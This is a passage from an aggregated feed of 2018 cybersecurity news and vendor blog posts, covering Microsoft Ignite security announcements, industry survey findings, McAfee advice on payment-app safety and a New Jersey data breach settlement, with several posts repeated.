Sensitive data isnt only in databases and cloud workloads. A huge amount of the information we share in email and documents is private or sensitive too. To effectively protect your most important data, you need intelligent solutions that enable you to automatically discover, classify, label, protect, and monitor itno matter where it lives or travels. The Microsoft Information Protection solutions we announced last year help to do just that. Today, we are rolling out a unified labeling experience in the Security & Compliance center, which gives you a single, integrated approach to creating data sensitivity and data retention labels. We are also previewing labeling capabilities that are built right into Office apps across all major platforms, and extending labeling and protection capabilities to include PDF documents. The Microsoft Information Protection SDK, now generally available, enables other software creators to enhance and build their own applications that understand, apply, and act on Microsofts sensitivity labels.

Driving partnerships for a heterogenous world

To address a challenge as big as cybersecurity, we do more than only drive technological innovation. We invest in a broad set of technology and policy partnership initiatives.

We work across the industry to advance the state of the art and to lead on standards through organizations like the FIDO alliance, and to tackle emerging new ecosystem challenges like security for MCU-powered devices with innovations such as Azure Sphere, now available for preview.

We also work with our fellow security vendors to integrate the variety of security tools that our mutual customers use through our Microsoft Intelligent Security Association. Specifically, the Microsoft Graph Security API, generally available starting today, helps our partners work with us and each other to give you better threat detection and faster incident response. It connects a broad heterogeneous ecosystem of security solutions via a standard interface to help integrate security alerts, unlock contextual information, and simplify security automation.

Microsoft is working with tech companies, policymakers, and institutionscritical to the democratic processon strategies to protect our midterm elections. The Defending Democracy program is working to protect political campaigns from hacking, increase security of the electoral process, defend against disinformation, and bring greater transparency to political advertising online. Part of this program is the AccountGuard initiative that provides state-of-the-art cybersecurity protection at no extra cost to all candidates and campaign offices at the federal, state, and local level, as well as think tanks and political organizations. Weve had strong interest in AccountGuard and in the first month onboarded more than 30 organizations. Weve focused on onboarding large national party operations first and have successfully done so for committees representing both major U.S. parties as well as high profile campaigns and think tanks, and we are working to onboard additional groups each week. Microsoft is developing plans to extend our Defending Democracy program to democracies around the world.

Since participating in the establishment of the Cybersecurity Tech Accord, an agreement to defend all customers everywhere from malicious attacks by cybercriminal enterprises and nation states, we have seen that group nearly double in size with 27 new organizations joining from around the globe, including Panasonic, Salesforce, Swisscom, and Rockwell Automation to name a few, bringing total signatories to 61. Our Digital Crimes Unit has worked with global law enforcement agencies to bring criminals to justice: to date, taking down 18 criminal bot-nets and rescuing nearly 500 million devices from secret bot-net control. In partnership with security teams across the company, the Digital Crimes Unit has also combatted nation-state hackers, using innovative legal approaches 12 times in two years to shut down 84 fake websites, often used in phishing attacks and set up by a group known as Strontium that is widely associated with the Russian government.

Our unique leadership and unmatched breadth of impact in security comes with a unique responsibility to make the world a safer place. We embrace it, and I am optimistic about what we can do. Together with our customers, we are turning the tide in cybersecurity.

Ill be talking about these announcements and more today in my session at Ignite. If youre not in Orlando, you can live stream it. To learn more about Microsofts security offerings, visit Microsoft.com/security.

The post Delivering security innovation that puts Microsoft’s experience to work for you appeared first on Microsoft Secure.

What do you mean by storage encryption?

In my year-long research project, the F5 Labs’ 2018 Application Protection Report, I asked if security professionals used storage encryption for data and applications. About 19% of survey respondents said they didn’t do any while 39% said they used encryption most of the time and 42% said they used it some of the time. What I didn’t ask and should have asked (and I will ask next year) is how they defined storage encryption. It’s … More

The post What do you mean by storage encryption? appeared first on Help Net Security.

A law enforcement view of emerging cybercrime threats

Cybercriminals are adopting creative new techniques to target their victims at an unprecedented pace and are constantly seeking methods to avoid law enforcement detection. To stay ahead of them, law enforcement should target cybercriminals offering “off-the-shelf” cyber-attack services or products to make it more difficult for low-level cybercriminals to carry out high-level attacks. Europol’s fifth annual Internet Organised Crime Threat Assessment (IOCTA), offers a unique law enforcement view of the emerging threats and key developments … More

The post A law enforcement view of emerging cybercrime threats appeared first on Help Net Security.

How organizations overcome cybersecurity hiring challenges

A strong security-focused culture and adherence to best practices helps companies attract and retain cybersecurity talent. (ISC)² commissioned the study to better understand how successful organizations are overcoming the shortage of skilled cybersecurity talent in a demand-heavy, competitive recruitment environment. “The growing cybersecurity workforce gap has received a lot of media attention. What we haven’t heard as much about is how some companies are actually succeeding in building their security teams even in the face … More

The post How organizations overcome cybersecurity hiring challenges appeared first on Help Net Security.

Better security needed to harness the positive potential of AI

Despite heightened interest in enterprise deployment of artificial intelligence, only 40 percent of respondents to ISACA’s second annual Digital Transformation Barometer express confidence that their organizations can accurately assess the security of systems based on AI and machine learning. This becomes especially striking given the potential for serious consequences from maliciously trained AI; survey respondents identify social engineering, manipulated media content and data poisoning as the types of malicious AI attacks that pose the greatest … More

The post Better security needed to harness the positive potential of AI appeared first on Help Net Security.

How companies view their cyber exposure, and how they deal with it

The 2018 Travelers Risk Index found cyber risks are the No. 2 concern across all business sizes and industries, and the percentage of businesses reporting they have been the victim of a cyber attack has doubled. Despite all of this and the fact that 52 percent of respondents believe that suffering a cyber attack is inevitable, a majority of those surveyed reported not taking adequate steps to protect themselves. In the Travelers’ survey of more … More

The post How companies view their cyber exposure, and how they deal with it appeared first on Help Net Security.

Bitcoin Network Faced One-Two Punch of Inflation and DoS Threats

Bitcoin Core has emerged seemingly unscathed from a major vulnerability that threatened to shut down parts of the network in a denial-of-service (DoS) attack. But apparently, the bug was even worse than originally thought. According to a Bitcoin Core Full Disclosure Report, the issue included an “inflation vulnerability,” one in which if seized upon could […]

The post Bitcoin Network Faced One-Two Punch of Inflation and DoS Threats appeared first on Hacked: Hacking Finance.

Why identity verification needs to be a part of your digital transformation strategy

Smartphones and tablets are an indispensable part of daily life, and consumers expect nothing less than a streamlined mobile experience. With this in mind, businesses are focusing on digital transformation efforts in order to deliver an excellent customer experience. According to a recent Forrester report, 56 percent of companies said digitization is currently underway, and 38 percent of companies said digital transformation will have the greatest effect on business decisions over the next year. As … More

The post Why identity verification needs to be a part of your digital transformation strategy appeared first on Help Net Security.

Security priorities are shifting in response to increased cybersecurity complexity

The increased complexity of the IT environment, combined with increasingly sophisticated attacks and a rapidly evolving threat landscape, is causing organizations to invest more money in cybersecurity and start to focus on the impact of cyber threats and cybersecurity from a business perspective, according to a research report conducted by Enterprise Strategy Group (ESG). Reasons why cybersecurity has become more difficult One of the report’s key findings is that in many organizations (96 percent), the … More

The post Security priorities are shifting in response to increased cybersecurity complexity appeared first on Help Net Security.

Security data reveals worldwide malicious login attempts are on the rise

According to the Akamai 2018 State of the Internet / Security Credential Stuffing Attacks report, worldwide malicious login attempts are on the rise. Akamai detected approximately 3.2 billion malicious logins per month from January through April 2018, and over 8.3 billion malicious login attempts from bots in May and June 2018 – a monthly average increase of 30 percent. In total, from the beginning of November 2017 through the end of June 2018, researcher analysis … More

The post Security data reveals worldwide malicious login attempts are on the rise appeared first on Help Net Security.

Why voice fraud rates continue to rise with no signs of slowing down

Pindrop released its annual report detailing developments in fraud, the future of voice and the impact to customer service across various industries. In the report, Pindrop reveals the rate of voice fraud climbed over 350 percent from 2013 through 2017, with no signs of slowing down. Additionally, between 2016 and 2017, overall voice channel fraud increased by 47 percent, or one in every 638 calls. The year-over-year increase can be attributed to several causes, including … More

The post Why voice fraud rates continue to rise with no signs of slowing down appeared first on Help Net Security.

Get deeper into security at Microsoft Ignite 2018

This year at Microsoft Ignite, we will be making some exciting announcementsfrom new capabilities for identity management and information protection to powerful artificial intelligence (AI) innovations that can help you stay ahead of an often overwhelming surge in threats and security alerts.

Join us as we share best practices for current products, reveal highlights of our new offerings, and give you a glimpse of our future product vision.

Start by attending Satya Nadellas keynote. Then kickstart your security journey with this session: Microsoft Security: How the cloud helps us all be more secure featuring Rob Lefferts (GS008). Well highlight whats new in Microsoft security and how our customers and partners are using the Microsoft Cloud to accelerate security and productivity. Watch our demo showcase to see for yourself how unique intelligence and new innovations from Microsoft can help you be more secure across your entire digital estate.

Here are just a few of the other sessions at Ignite that will showcase our security technology and the innovation we have invested in throughout 2018 and into 2019. Add them to your Session Scheduler and check out the Session Catalog for the full list. If you cant attend in person, you can watch the live stream starting on September 24 with on-demand sessions to follow.

  • Leveraging the power of Microsoft threat protection (BRK4000). Learn about the services that make up Microsoft threat protection and how they work together across data, endpoints, identities, and infrastructure.
  • Double your security team productivitywithout doubling capacity (BRK2251). Learn how automated threat protection and remediation works seamlessly out of the box, using AI to respond to alerts and help security teams solve capacity and skill-gap challenges.
  • How to build security applications using the Microsoft Graph Security API (WRK3006). The Microsoft Graph has been extended with a new Security Graph API. Join this lab to get started using the Security API, including creating and authenticating a new app and using sample code to query the API.
  • Azure Active Directory: New features and roadmap (BRK2254). Come to this can’t-miss session for anyone working with or considering their strategy for identity and access management in the cloud. Hear about the newest features and experiences across identity protection, conditional access, single sign-on, hybrid identity environments, managing partner and customer access, and more.
  • Using Microsoft Secure Score to harden your security position (BRK3247). In this session, we help you understand what your current security position is in products like Office 365 and Windows and show you how you can easily increase your position though the built-in recommendations.
  • Getting to a world without passwords (BRK3031). Get the latest info and demos on what’s new with FIDO2, WebAuthN, Azure Active Directory, Windows Hello, and Microsoft Authenticator to help you make passwords a relic of the past.
  • Accelerate deployment and adoption of Azure Information Protection (BRK3009). Learn all about best practices in deploying Azure Information Protection to help protect your sensitive datawherever it lives or travels.
  • Registering and managing apps through Microsoft Azure Portal and Microsoft Graph API (THR2079). Come learn how to register apps to sign in Azure AD and personal Microsoft accounts, manage these apps, and get access to APIs all through Azure Portal, Microsoft Graph API, and PowerShell.
  • Secure enterprise productivity with Office 365 threat protection services (BRK4001). Learn about the latest advanced in services such as Exchange Online Protection (EOP), Advanced Threat Protection (ATP), and Threat Intelligenceand get a detailed roadmap of whats to come.
  • Simplify your IT management and level up with Microsoft 365 (GS004). Come and learn how Microsoft 365 will help you simplify your modern workplace, delight and empower your users, and protect and secure your corporate assets.
  • Managing devices with Microsoft Intunewhats new (BRK3036). Learn how Intune raises the bar once again for Android, Apple, and Windows device management, and hear more about the exciting new features and new use-cases announced at Ignite.
  • Elevate the security for all your cloud apps and services with the Microsoft Cloud App Security (CASB) solution (BRK2158). Gain visibility into your cloud apps and services with sophisticated analytics to identify and combat cyberthreats, and control how your ubiquitous data travels.

And one other exciting note: To see our solutions in action and gain access to a 6-month free trial of our EMS E5 solution, be sure to stop by the Microsoft Showcase for in-depth product demos and discussions with security experts.

For more Ignite news and updates, check back to our Secure Blog as we continue to highlight specific sessions and topics throughout the week.

The post Get deeper into security at Microsoft Ignite 2018 appeared first on Microsoft Secure.

Microsoft Secure: Get deeper into security at Microsoft Ignite 2018

This year at Microsoft Ignite, we will be making some exciting announcementsfrom new capabilities for identity management and information protection to powerful artificial intelligence (AI) innovations that can help you stay ahead of an often overwhelming surge in threats and security alerts.

Join us as we share best practices for current products, reveal highlights of our new offerings, and give you a glimpse of our future product vision.

Start by attending Satya Nadellas keynote. Then kickstart your security journey with this session: Microsoft Security: How the cloud helps us all be more secure featuring Rob Lefferts (GS008). Well highlight whats new in Microsoft security and how our customers and partners are using the Microsoft Cloud to accelerate security and productivity. Watch our demo showcase to see for yourself how unique intelligence and new innovations from Microsoft can help you be more secure across your entire digital estate.

Here are just a few of the other sessions at Ignite that will showcase our security technology and the innovation we have invested in throughout 2018 and into 2019. Add them to your Session Scheduler and check out the Session Catalog for the full list. If you cant attend in person, you can watch the live stream starting on September 24 with on-demand sessions to follow.

  • Leveraging the power of Microsoft threat protection (BRK4000). Learn about the services that make up Microsoft threat protection and how they work together across data, endpoints, identities, and infrastructure.
  • Double your security team productivitywithout doubling capacity (BRK2251). Learn how automated threat protection and remediation works seamlessly out of the box, using AI to respond to alerts and help security teams solve capacity and skill-gap challenges.
  • How to build security applications using the Microsoft Graph Security API (WRK3006). The Microsoft Graph has been extended with a new Security Graph API. Join this lab to get started using the Security API, including creating and authenticating a new app and using sample code to query the API.
  • Azure Active Directory: New features and roadmap (BRK2254). Come to this can’t-miss session for anyone working with or considering their strategy for identity and access management in the cloud. Hear about the newest features and experiences across identity protection, conditional access, single sign-on, hybrid identity environments, managing partner and customer access, and more.
  • Using Microsoft Secure Score to harden your security position (BRK3247). In this session, we help you understand what your current security position is in products like Office 365 and Windows and show you how you can easily increase your position though the built-in recommendations.
  • Getting to a world without passwords (BRK3031). Get the latest info and demos on what’s new with FIDO2, WebAuthN, Azure Active Directory, Windows Hello, and Microsoft Authenticator to help you make passwords a relic of the past.
  • Accelerate deployment and adoption of Azure Information Protection (BRK3009). Learn all about best practices in deploying Azure Information Protection to help protect your sensitive datawherever it lives or travels.
  • Registering and managing apps through Microsoft Azure Portal and Microsoft Graph API (THR2079). Come learn how to register apps to sign in Azure AD and personal Microsoft accounts, manage these apps, and get access to APIs all through Azure Portal, Microsoft Graph API, and PowerShell.
  • Secure enterprise productivity with Office 365 threat protection services (BRK4001). Learn about the latest advanced in services such as Exchange Online Protection (EOP), Advanced Threat Protection (ATP), and Threat Intelligenceand get a detailed roadmap of whats to come.
  • Simplify your IT management and level up with Microsoft 365 (GS004). Come and learn how Microsoft 365 will help you simplify your modern workplace, delight and empower your users, and protect and secure your corporate assets.
  • Managing devices with Microsoft Intunewhats new (BRK3036). Learn how Intune raises the bar once again for Android, Apple, and Windows device management, and hear more about the exciting new features and new use-cases announced at Ignite.
  • Elevate the security for all your cloud apps and services with the Microsoft Cloud App Security (CASB) solution (BRK2158). Gain visibility into your cloud apps and services with sophisticated analytics to identify and combat cyberthreats, and control how your ubiquitous data travels.

And one other exciting note: To see our solutions in action and gain access to a 6-month free trial of our EMS E5 solution, be sure to stop by the Microsoft Showcase for in-depth product demos and discussions with security experts.

For more Ignite news and updates, check back to our Secure Blog as we continue to highlight specific sessions and topics throughout the week.

The post Get deeper into security at Microsoft Ignite 2018 appeared first on Microsoft Secure.



Microsoft Secure

Radware Blog: Don’t Let Your Data Seep Through The Cracks: Cybersecurity For the Smart Home

Technology and wireless connectivity have forever changed households. While we don’t have the personal hovercrafts or jetpacks that we were promised as children, infinite connectivity has brought a whirlwind of “futuristic” benefits and luxuries few could have imagined even a decade ago. But more importantly, it has re-defined how the modern domicile needs to be […]

The post Don’t Let Your Data Seep Through The Cracks: Cybersecurity For the Smart Home appeared first on Radware Blog.



Radware Blog

How do you protect digital channels from cyber threats?

A well-thought out and managed social media presence is a must for most companies and their workforce, but too few of them think about the potential repercussions of an attack targeting it. Social media is increasingly seen as a battleground, providing the platform for complex influence campaigns mounted by nation-states (Iran, Russia), various hacker groups to get their message out and to advertise their services, and attackers looking to trick other users into parting with … More

The post How do you protect digital channels from cyber threats? appeared first on Help Net Security.

Better security needed to harness the positive potential of AI, mitigate risks of attacks

Despite heightened interest in enterprise deployment of artificial intelligence, only 40 percent of respondents to ISACA’s second annual Digital Transformation Barometer express confidence that their organizations can accurately assess the security of systems based on AI and machine learning. This becomes especially striking given the potential for serious consequences from maliciously trained AI; survey respondents identify social engineering, manipulated media content and data poisoning as the types of malicious AI attacks that pose the greatest … More

The post Better security needed to harness the positive potential of AI, mitigate risks of attacks appeared first on Help Net Security.

Building security into DevOps versus bolting it on

In this podcast, Hari Srinivasan, Director of Product Management for Qualys, talks about building security into DevOps versus bolting it on, specifically for containers. Here’s a transcript of the podcast for your convenience. Hello! My name is Hari Srinivasan, Director of Product Management for Qualys, cloud and virtualization security. Welcome to this Help Net Security podcast. Today we’re going to talk about building security into DevOps versus bolting it on, specifically for containers. Containers are … More

The post Building security into DevOps versus bolting it on appeared first on Help Net Security.

Radware Blog: Millennials and Cybersecurity: Understanding the Value of Personal Data

From British Airways to Uber, recent data breaches have shown how valuable our data is to cybercriminals – and the lengths to which they will go to access it. The size and impact of these breaches has meant that topics once reserved for tech experts and IT personnel have transitioned into a more mainstream conversation. […]

The post Millennials and Cybersecurity: Understanding the Value of Personal Data appeared first on Radware Blog.



Radware Blog

Malicious hacking activity increasingly targeting critical infrastructure

In this podcast, Andrew Ginter, VP of Industrial Security at Waterfall Security Solutions, and Edward Amoroso, CEO of TAG Cyber, talk about how the traditional focus of most hackers has been on software, but the historical focus of crime is on anything of value. It should come as no surprise, therefore, that as operational technology (OT) and industrial control system (ICS) infrastructure have become much more prominent components of national critical infrastructure, that malicious hacking … More

The post Malicious hacking activity increasingly targeting critical infrastructure appeared first on Help Net Security.

Why humans are necessary to the threat hunting process

For thousands of years, humans have worked to collect intelligence on their enemies. Intelligence gathering is not a new practice; in fact, it is one of the oldest war tactics dating back to biblical times, when warlords and army commanders used it to gain advantages over their rivals. However, the methods have changed as new technologies and new forms of “warfare” have been developed. In recent years, cyber-attacks have led to an entirely new host … More

The post Why humans are necessary to the threat hunting process appeared first on Help Net Security.

83% of SMB owners have no cash put aside to deal with the fallout from a cyber attack

Small businesses are leaving themselves exposed to significant financial risk from cybercrime by not having adequate measures in place to recover in the event of a cyber attack. That’s according to the findings of InsuranceBee’s Cyber Survey, which asked more than 1,000 SMBs how prepared they are to deal with cybercrime. Although the average cost for small and medium-sized businesses to recover from a cyber attack is estimated to be $120,000, 83% of SMBs do … More

The post 83% of SMB owners have no cash put aside to deal with the fallout from a cyber attack appeared first on Help Net Security.

Regtech to account for 40% of global compliance spend by 2023

A new study from Juniper Research has found that spending on Regtech platforms will exceed $115 billion by 2023, up from an estimated $18 billion in 2018. The research found increased regulatory pressures, as demonstrated by the recent GDPR implementation, are driving businesses towards Regtech to meet greater compliance challenges. According to the research, any heavily regulated business sector not prioritising Regtech adoption would risk damaging fines from failing to keep pace with regulatory changes. … More

The post Regtech to account for 40% of global compliance spend by 2023 appeared first on Help Net Security.

Guarding the Gate: Cybersecurity De-Mystified

With individuals, businesses and critical infrastructure increasingly becoming the target of cyber-attacks, cybersecurity today is a multifaceted challenge. As the saying goes, “There’s more than one way to skin a cat.” And if the cat equates to preventing, detecting or discovering disruptive data breaches and determining the root cause, the vendor community has certainly come […]… Read More

The post Guarding the Gate: Cybersecurity De-Mystified appeared first on The State of Security.

The State of Security: Guarding the Gate: Cybersecurity De-Mystified

With individuals, businesses and critical infrastructure increasingly becoming the target of cyber-attacks, cybersecurity today is a multifaceted challenge. As the saying goes, “There’s more than one way to skin a cat.” And if the cat equates to preventing, detecting or discovering disruptive data breaches and determining the root cause, the vendor community has certainly come […]… Read More

The post Guarding the Gate: Cybersecurity De-Mystified appeared first on The State of Security.



The State of Security

Infosecurity.US: Gerhard Jacob’s ‘Taking Stock: The Internet of Things and Machine Learning Algorithms at War’

Image Credit , Israeli Defense Forces, The IDF Desert Rreconnaissance Battalion Training Exercises

Terrific blog post by Gerhard Jacobs, writing at the Imperva Cybersecurity blog, and discussing IoT and ML with Gilad Yehudai (Gilad is a Security Research Engineer at Imperva), this time where connect devices and machine learning both interact and inform war fighting and warrior capabilities. Today's Must Read.



Infosecurity.US

McAfee Blogs: Mobile and Digital Payments: Worth the Risk?

Thanks in part to the convenience that our mobile devices provide for us, much of the world operates now on instant gratification. From accessing information on the web to doing work –and now sending and receiving digital payments– our devices and applications support us while we’re on the go. Whether we’re paying a friend for dinner, our roommate for rent, or otherwise, many of us use peer-to-peer (P2P) mobile and digital payment apps rather than cash to settle our bills.

P2P mobile and digital payment apps like Cash App, PayPal, Venmo, and Zelle have changed the way we transfer money; today it’s faster, simpler, and easier than ever. In fact, they’re so popular that it’s estimated that in 2018, $700 billion will be transferred in this manner. With so much money being sent and received in this way, the ease of transfer begs the question, how secure are these apps?

While some have turned to using cryptocurrency and blockchain to curtail the known dangers of traditional mobile payment apps, recent cryptojacking incidents have proven that even this new technology is not foolproof when it comes to cybersecurity and the determination of cybercriminals. And while the convenience of digital payments can’t be denied, we seem to be prioritizing ease of use over security. Let’s take a look at how digital payments work, as well as their security implications.

How Digital Payments Work

P2P apps like Venmo, Cash App, and others essentially all work in the same way.  Functioning as a digital wallet, users link the app to their bank accounts or credit and debit cards. Then the app adds or subtracts money based on when users receive or send a payment. From there, users can “cash out” their balance to their preferred digital property, such as the account attached to a card or bank account.

P2P Money Transfer Apps and Cybersecurity Concerns

On the surface, digital money transfers may seem harmless, when in fact, they could lead to a headache of unforeseen cybersecurity concerns. The good news is that most money transfer apps will reimburse you for fraudulent charges. However, if someone has physical access to your phone and you don’t keep it locked, they can send money to themselves or others and you won’t get that money back.

Aside from the obvious concern of losing your phone, if you use an unsecured network to transfer money, it’s easier for someone to launch a phishing attack to gain access to your data. That’s because some payment apps will send request links from other users to download the app on their device. These links can be manipulated by cybercriminals and often contain just a letter or number off so that these changes go unnoticed by day-to-day users. When clicked on, a user can be redirected to a web page and presented with malware or a virus and might be prompted to download it– giving an unfriendly host access to your financial information. Thankfully, leveraging your data plan or a VPN rather than an unsecured or pubic Wi-Fi network can help create an extra layer of protection, making it more difficult for cybercriminals to access your sensitive data.

Lastly, there are often unforeseen holes in software that provide backdoor access to your financial information. Meticulously updating the software on your mobile device can help patch up known security issues, also making it easier to protect your data.

Tips to Stay Safe While Using Peer-to-Peer Money Transfer Apps

If you already use a peer-to-peer money transfer app or are on the fence about downloading one, here are some tips to take into account. By practicing multiple security habits simultaneously, your financial information is much more likely to remain safe on your devices and apps:

  • Set up additional security measures. P2P payment platforms require access to sensitive financial information. Check your account settings to see if you can enable multi-factor authentication, PIN/Password requirement, or use fingerprint recognition.
  • Check your preferred app’s permission or settings. Some might share information about your transactions on social media or on the platform itself, like Venmo. Make adjustments to these settings if and when you see fit.
  • Update your software and apps. It’s a best practice to update software and apps when prompted to help seal vulnerabilities when they’re found.
  • Be aware of where you are conducting your money transfers. Opt to use your data plan or a secure, private Wi-Fi network when using a P2P payment app. If you connected to public Wi-Fi, cybercriminals could use the holes in these networks to access your personal banking information and possibly access your P2P app account. If you must use public Wi-Fi, then it’s a good idea to use a Virtual Private Network (VPN).
  • Confirm the deposit went through. When you receive a payment, that money is added to your in-system balance. This is where it will remain until you initiate the transfer to your bank account or use it for another transaction within the app. If you transfer the balance to your bank, confirm it went through. This could take anywhere from a few days to a week. If it takes longer, it’s worth investigating to stop suspicious behavior in its tracks.
  • Be wary of scammers and cybercriminals. If you don’t know the person to which you are sending a digital transfer (say to purchase tickets to an event), look for poor spelling or grammar from them and read links carefully. If something doesn’t look right, that’s often a tell-tale sign that you’re being led astray. Try to find an alternative way to pay, or better yet – find someone who is more trustworthy.

Interested in learning more about IoT and mobile security tips and trends? Stop by ProtectWhatMatters.online, and follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Mobile and Digital Payments: Worth the Risk? appeared first on McAfee Blogs.



McAfee Blogs

Mobile and Digital Payments: Worth the Risk?

Thanks in part to the convenience that our mobile devices provide for us, much of the world operates now on instant gratification. From accessing information on the web to doing work –and now sending and receiving digital payments– our devices and applications support us while we’re on the go. Whether we’re paying a friend for dinner, our roommate for rent, or otherwise, many of us use peer-to-peer (P2P) mobile and digital payment apps rather than cash to settle our bills.

P2P mobile and digital payment apps like Cash App, PayPal, Venmo, and Zelle have changed the way we transfer money; today it’s faster, simpler, and easier than ever. In fact, they’re so popular that it’s estimated that in 2018, $700 billion will be transferred in this manner. With so much money being sent and received in this way, the ease of transfer begs the question, how secure are these apps?

While some have turned to using cryptocurrency and blockchain to curtail the known dangers of traditional mobile payment apps, recent cryptojacking incidents have proven that even this new technology is not foolproof when it comes to cybersecurity and the determination of cybercriminals. And while the convenience of digital payments can’t be denied, we seem to be prioritizing ease of use over security. Let’s take a look at how digital payments work, as well as their security implications.

How Digital Payments Work

P2P apps like Venmo, Cash App, and others essentially all work in the same way.  Functioning as a digital wallet, users link the app to their bank accounts or credit and debit cards. Then the app adds or subtracts money based on when users receive or send a payment. From there, users can “cash out” their balance to their preferred digital property, such as the account attached to a card or bank account.

P2P Money Transfer Apps and Cybersecurity Concerns

On the surface, digital money transfers may seem harmless, when in fact, they could lead to a headache of unforeseen cybersecurity concerns. The good news is that most money transfer apps will reimburse you for fraudulent charges. However, if someone has physical access to your phone and you don’t keep it locked, they can send money to themselves or others and you won’t get that money back.

Aside from the obvious concern of losing your phone, if you use an unsecured network to transfer money, it’s easier for someone to launch a phishing attack to gain access to your data. That’s because some payment apps will send request links from other users to download the app on their device. These links can be manipulated by cybercriminals and often contain just a letter or number off so that these changes go unnoticed by day-to-day users. When clicked on, a user can be redirected to a web page and presented with malware or a virus and might be prompted to download it– giving an unfriendly host access to your financial information. Thankfully, leveraging your data plan or a VPN rather than an unsecured or pubic Wi-Fi network can help create an extra layer of protection, making it more difficult for cybercriminals to access your sensitive data.

Lastly, there are often unforeseen holes in software that provide backdoor access to your financial information. Meticulously updating the software on your mobile device can help patch up known security issues, also making it easier to protect your data.

Tips to Stay Safe While Using Peer-to-Peer Money Transfer Apps

If you already use a peer-to-peer money transfer app or are on the fence about downloading one, here are some tips to take into account. By practicing multiple security habits simultaneously, your financial information is much more likely to remain safe on your devices and apps:

  • Set up additional security measures. P2P payment platforms require access to sensitive financial information. Check your account settings to see if you can enable multi-factor authentication, PIN/Password requirement, or use fingerprint recognition.
  • Check your preferred app’s permission or settings. Some might share information about your transactions on social media or on the platform itself, like Venmo. Make adjustments to these settings if and when you see fit.
  • Update your software and apps. It’s a best practice to update software and apps when prompted to help seal vulnerabilities when they’re found.
  • Be aware of where you are conducting your money transfers. Opt to use your data plan or a secure, private Wi-Fi network when using a P2P payment app. If you connected to public Wi-Fi, cybercriminals could use the holes in these networks to access your personal banking information and possibly access your P2P app account. If you must use public Wi-Fi, then it’s a good idea to use a Virtual Private Network (VPN).
  • Confirm the deposit went through. When you receive a payment, that money is added to your in-system balance. This is where it will remain until you initiate the transfer to your bank account or use it for another transaction within the app. If you transfer the balance to your bank, confirm it went through. This could take anywhere from a few days to a week. If it takes longer, it’s worth investigating to stop suspicious behavior in its tracks.
  • Be wary of scammers and cybercriminals. If you don’t know the person to which you are sending a digital transfer (say to purchase tickets to an event), look for poor spelling or grammar from them and read links carefully. If something doesn’t look right, that’s often a tell-tale sign that you’re being led astray. Try to find an alternative way to pay, or better yet – find someone who is more trustworthy.

Interested in learning more about IoT and mobile security tips and trends? Stop by ProtectWhatMatters.online, and follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Mobile and Digital Payments: Worth the Risk? appeared first on McAfee Blogs.

Insurance experts expect higher cyber-related losses

Insurance companies are expecting increased cyber-related losses across all business lines over the next 12-months, driven by increasing reliance on technology and high-profile cyber-attacks, according to Willis Towers Watson. The survey reveals that over 60% of respondents estimate it is likely to incur more than one cyber related loss for every hundred non-cyber covered losses over the next 12 months in all lines of business apart from workers compensation compared to less than 50% in … More

The post Insurance experts expect higher cyber-related losses appeared first on Help Net Security.

Linus Torvalds Apologizes For His Rude Behavior—Takes Time Off

What just happened would definitely gonna surprise you. Linus Torvalds—father of the Linux open-source operating system—finally admitted his behavior towards other developers in the Linux community was hurting people and Linux. In a surprising move this weekend, Torvalds apologized for insulting and abusing other developers for almost three decades and took a break from the open-source

ENISA launches Cybersecurity Strategies Evaluation Tool

The European Union Agency for Network and Information Security (ENISA) has launched a tool that will help EU Member States evaluate their priorities according to their National Cyber Security Strategies. ENISA supports EU Member States Since 2012, ENISA has been supporting the EU Member States to develop, implement and evaluate their National Cyber Security Strategies. To achieve this goal, ENISA has developed several tools, studies, guidelines and a group of experts. Initially, only 12 Member … More

The post ENISA launches Cybersecurity Strategies Evaluation Tool appeared first on Help Net Security.

How to create a Hall of Fame caliber cybersecurity playbook

Whether the sport is football, basketball or hockey, all the best coaches have playbooks and reports with the latest information on opponents. They study the playing field and never go into a game unprepared, spending hours fine tuning strategies, whether that’s finding the perfect angle to swoop past defenders or knowing an offenses’ weakness and stopping them dead in their tracks. Cybersecurity should be no different. Sure, you’re not a quarterback looking for a lane … More

The post How to create a Hall of Fame caliber cybersecurity playbook appeared first on Help Net Security.

Seizing cyber resilience mastery in financial services

Despite the volume of cyberattacks doubling in 2017, financial services firms are closing the gap on cyberattacks, having stopped four in five of all breach attempts last year, up from two-thirds in 2016, according to Accenture. However, firms will need to improve their security procedures to heed off increasingly sophisticated attacks powered by new technologies. The study, “2018 State of Cyber Resilience for Financial Services,” is based on a survey of more than 800 enterprise … More

The post Seizing cyber resilience mastery in financial services appeared first on Help Net Security.

Awareness and tendency towards risky online behavior

​Spanning Cloud Apps announced the results of a survey of over 400 full-time U.S. employees on their awareness of and tendency towards risky online behavior. The study measured U.S. workers’ risk aversion for a range of behaviors, including use of online account credentials, susceptibility to phishing attacks and potential for data loss. It found that, while employees are generally risk averse, more than half (55 percent) admitted to clicking links they didn’t recognize, 45 percent … More

The post Awareness and tendency towards risky online behavior appeared first on Help Net Security.

The State of Security: 80 Percent of US Adults Have Never Considered Cybersecurity Careers, Survey Finds

Cyberattacks hit record highs last year, with nearly 160,000 cyber incidents reported and seven billion records exposed in the first three quarters of 2017, according to Online Trust Alliance’s Cyber Incidents and Breaches Trends Report. With the ubiquity of cyberattacks comes a need for more professionals. However, skilled individuals who are not already in the […]… Read More

The post 80 Percent of US Adults Have Never Considered Cybersecurity Careers, Survey Finds appeared first on The State of Security.



The State of Security

80 Percent of US Adults Have Never Considered Cybersecurity Careers, Survey Finds

Cyberattacks hit record highs last year, with nearly 160,000 cyber incidents reported and seven billion records exposed in the first three quarters of 2017, according to Online Trust Alliance’s Cyber Incidents and Breaches Trends Report. With the ubiquity of cyberattacks comes a need for more professionals. However, skilled individuals who are not already in the […]… Read More

The post 80 Percent of US Adults Have Never Considered Cybersecurity Careers, Survey Finds appeared first on The State of Security.

Software Company Settles with New Jersey AG Over Data Breach

On September 7, 2018, the New Jersey Attorney General announced a settlement with data management software developer Lightyear Dealer Technologies, LLC, doing business as DealerBuilt, resolving an investigation by the state Division of Consumer Affairs into a data breach that exposed the personal information of car dealership customers in New Jersey and across the country. The breach occurred in 2016, when a researcher exposed a gap in the company’s security and gained access to unencrypted files containing names, addresses, social security numbers, driver’s license numbers, bank account information and other data belonging to thousands of individuals, including at least 2,471 New Jersey residents.

To resolve the investigation, DealerBuilt agreed to undertake a number of changes to its security practices to help prevent similar breaches from occurring in the future, including:

  • the creation of an information security program to be implemented and maintained by a chief security officer;
